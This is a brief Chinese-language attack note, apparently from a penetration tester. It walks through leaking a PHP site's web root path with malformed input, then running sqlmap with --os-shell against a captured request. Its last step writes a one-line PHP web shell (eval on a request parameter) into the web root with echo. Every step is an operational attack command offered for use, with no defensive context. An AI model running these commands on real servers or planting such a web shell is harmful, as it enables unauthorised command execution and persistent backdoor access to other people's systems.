1. 可通过抓包,输入不合法的字符让页面回显出根路径
如:c:\appserv\www\phptest2\db_func.php
我们需要猜测根目录是在 c:\appserv\www\phptest2\ 还是在 c:\appserv\www\
2. 检测注入点 ,并进行--os-shell
python sqlmap.py -r C:\Users\111.txt --os-shell
3.可通过 echo 来创建一句话木马 (根据过滤条件自行构造)
如:echo "<?php eval($_REQUEST[a])?>" > c:\appserv\www\phptest2\ 111.php